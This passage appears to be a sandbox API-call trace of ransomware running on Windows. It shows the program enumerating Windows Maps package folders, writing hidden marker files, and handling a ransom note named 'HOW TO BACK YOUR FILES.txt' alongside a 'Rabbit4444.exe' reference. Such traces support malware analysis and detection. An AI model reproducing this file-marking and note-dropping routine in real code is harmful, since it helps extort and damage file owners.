returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState" [0063.414] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123eb8 | out: hHeap=0xe0000) returned 1 [0063.414] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0063.414] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState" [0063.414] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\" [0063.415] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0063.415] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.416] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.418] FlushFileBuffers (hFile=0x298) returned 1 [0063.419] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.419] CloseHandle (hObject=0x298) returned 1 [0063.420] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState") returned 85 [0063.420] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.420] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab6289, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef201810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0063.420] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.420] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.420] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.420] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.420] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab6289, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef201810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.420] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.420] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.420] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.420] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.420] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.421] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef201810, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef201810, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef201810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.421] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.421] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.421] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef201810, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef201810, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef201810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.421] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0063.421] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.421] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.421] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.421] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.422] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.422] CloseHandle (hObject=0x278) returned 1 [0063.422] CloseHandle (hObject=0x298) returned 1 [0063.422] GetCurrentThreadId () returned 0xd98 [0063.422] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220e8 [0063.422] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache" [0063.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123bd8 | out: hHeap=0xe0000) returned 1 [0063.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220e0 | out: hHeap=0xe0000) returned 1 [0063.422] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache" [0063.422] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\" [0063.422] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0063.422] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.423] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.425] FlushFileBuffers (hFile=0x298) returned 1 [0063.426] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.426] CloseHandle (hObject=0x298) returned 1 [0063.427] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache") returned 85 [0063.427] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.427] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab5f4b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef201810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0063.427] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.427] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.427] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.427] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.427] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab5f4b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef201810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.427] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.427] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.427] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.427] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.427] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.427] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef201810, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef201810, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef201810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.427] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.427] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.427] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef201810, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef201810, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef201810, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.427] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0063.427] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.427] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.428] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.428] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.429] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.429] CloseHandle (hObject=0x278) returned 1 [0063.429] CloseHandle (hObject=0x298) returned 1 [0063.429] GetCurrentThreadId () returned 0xd98 [0063.429] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0063.429] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData" [0063.429] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ec8 | out: hHeap=0xe0000) returned 1 [0063.429] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0063.429] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData" [0063.429] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\" [0063.429] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0063.429] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.431] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.434] FlushFileBuffers (hFile=0x298) returned 1 [0063.435] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.435] CloseHandle (hObject=0x298) returned 1 [0063.435] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData") returned 82 [0063.435] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.435] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe22f6ae, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab5abf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef22773c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0063.436] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.436] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.436] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.436] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.436] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe22f6ae, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab5abf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef22773c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.436] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.436] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.436] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.436] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.436] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.436] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef22773c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef22773c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef22773c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.436] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.436] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.436] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef22773c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef22773c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef22773c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.436] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0063.436] lstrcpyW (in: lpString1=0x130ebde, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.437] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.437] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.437] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.437] CloseHandle (hObject=0x278) returned 1 [0063.437] CloseHandle (hObject=0x298) returned 1 [0063.437] GetCurrentThreadId () returned 0xd98 [0063.437] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0063.437] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC" [0063.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121ba8 | out: hHeap=0xe0000) returned 1 [0063.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0063.437] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC" [0063.437] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\" [0063.437] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0063.437] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.440] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.443] FlushFileBuffers (hFile=0x298) returned 1 [0063.444] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", 